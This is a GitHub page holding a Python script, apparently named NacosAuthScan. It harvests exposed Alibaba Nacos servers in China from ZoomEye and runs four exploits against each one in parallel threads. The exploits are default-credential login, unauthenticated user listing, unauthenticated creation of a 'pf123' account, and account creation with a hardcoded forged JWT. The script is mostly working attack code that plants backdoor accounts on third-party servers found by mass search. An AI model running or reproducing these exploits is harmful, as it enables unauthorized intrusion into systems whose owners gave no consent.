-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathscan.py
161 lines (133 loc) · 5.17 KB
/
scan.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
# -*- coding: utf-8 -*-
# @Time : 2023/7/21 16:49
# @Author : PFinal南丞 <[email protected]
# @File : scan.py
# @Software: PyCharm
import threading
import fire
import requests
import urllib3
import zoomeye.sdk as zoomeye
from colorama import Fore
urllib3.disable_warnings()
yellow = '\033[01;33m'
white = '\033[01;37m'
green = '\033[01;32m'
blue = '\033[01;34m'
red = '\033[1;31m'
end = '\033[0m'
version = 'v0.1'
message = white + '{' + red + version + ' #dev' + white + '}'
nacos_scan_banner = f"""
{yellow} NacosAuthScan is a tool to Scan for unauthorized {yellow}
_ _ _ _ _____
| \ | | /\ | | | | / ____| {message}{green}
| \| | __ _ ___ ___ ___ / \ _ _| |_| |__ | (___ ___ __ _ _ __ {blue}
| . ` |/ _` |/ __/ _ \/ __| / /\ \| | | | __| '_ \ \___ \ / __/ _` | '_ \ {blue}
| |\ | (_| | (_| (_) \__ \/ ____ \ |_| | |_| | | |____) | (_| (_| | | | | {green}
|_| \_|\__,_|\___\___/|___/_/ \_\__,_|\__|_| |_|_____/ \___\__,_|_| |_| {white}PFinal南丞{white}
{red}NacosAuthScan is under development, please update before each use!{end}
"""
zm = zoomeye.ZoomEye(api_key="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx")
data_queue = []
head = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
def poc1(url):
if url.endswith("/"):
path = "nacos/v1/auth/users/login"
else:
path = "/nacos/v1/auth/users/login"
data = {
"username": "nacos",
"password": "nacos"
}
checkpoc1 = requests.post(url=url + path, headers=head, data=data, verify=False)
if checkpoc1.status_code == 200:
print(Fore.GREEN + f"[+] {url} 存在默认口令nacos\n")
else:
print(Fore.RED + f"[-] {url} 不存在默认口令\n")
def poc2(url):
if url.endswith("/"):
path = "nacos/v1/auth/users?pageNo=1&pageSize=5"
else:
path = "/nacos/v1/auth/users?pageNo=1&pageSize=5"
checkpoc2 = requests.get(url=url + path, headers=head, verify=False)
if "username" in checkpoc2.text:
print(Fore.GREEN + f"[+] 存在未授权访问漏洞,你可访问 {url + path} 查看详细信息\n")
else:
print(Fore.RED + f"[-] {url} 不存在未授权访问漏洞\n")
def poc3(url):
if url.endswith("/"):
path = "nacos/v1/auth/users"
else:
path = "/nacos/v1/auth/users"
data = {
"username": "pf123",
"password": "pf123"
}
checkpoc3 = requests.post(url=url + path, headers=head, data=data, verify=False)
if "create user ok" in checkpoc3.text:
print(Fore.GREEN + f"[+] {url} 存在任意用户添加漏洞 【用户:pf123 密码为:pf123】 \n")
else:
print(Fore.RED + f"[-] {url} 不存在任意用户添加漏洞\n")
def poc4(url):
if url.endswith("/"):
path = "nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3OTA4NTg3NX0.WT8N_acMlow8KTHusMacfvr84W4osgSdtyHu9p49tvc"
else:
path = "/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3OTA4NTg3NX0.WT8N_acMlow8KTHusMacfvr84W4osgSdtyHu9p49tvc"
data = {
"username": "pf123",
"password": "pf123"
}
checkpoc4 = requests.post(url=url + path, headers=head, data=data, verify=False)
if "create user ok" in checkpoc4.text:
print(Fore.GREEN + f"[+] {url} 存在任意用户添加漏洞 【用户:pf123 密码为:pf123】添加成功\n")
else:
print(Fore.RED + f"[-] {url} 不存在默认JWT任意用户添加漏洞\n")
def send_request(ip_info):
""" send_request"""
detail_url = ip_info.get('ip') + ':' + str(ip_info.get('port'))
if ip_info.get('port') == '443':
detail_url = 'https://' + detail_url
else:
detail_url = 'http://' + detail_url
poc1(detail_url)
poc2(detail_url)
poc3(detail_url)
poc4(detail_url)
class ZScan:
""" 获取 """
def __init__(self):
self.queue = None
@staticmethod
def get_goal_from_zoom() -> None:
""" get_goal_from_zoom """
page = 1
try:
zm.dork_search('app:"Alibaba Nacos" +country:"CN"', page)
for ip in zm.dork_filter("ip,port"):
data_queue.append({'ip': str(ip[0]), 'port': str(ip[1])}) # 将采集的结果放入data_queue中
except Exception as e:
print(e)
@staticmethod
def scan_goal_from_queue():
""" scan_goal_from_queue """
threads = []
for ip_list in data_queue:
t = threading.Thread(target=send_request, args=(ip_list,))
threads.append(t)
t.start()
# 等待所有线程完成
for t in threads:
t.join()
def run_scan(action='-z', **kwargs):
"""run scan action"""
if action == '-z':
scan = ZScan()
scan.get_goal_from_zoom()
scan.scan_goal_from_queue()
if __name__ == '__main__':
print(nacos_scan_banner)
fire.Fire(run_scan)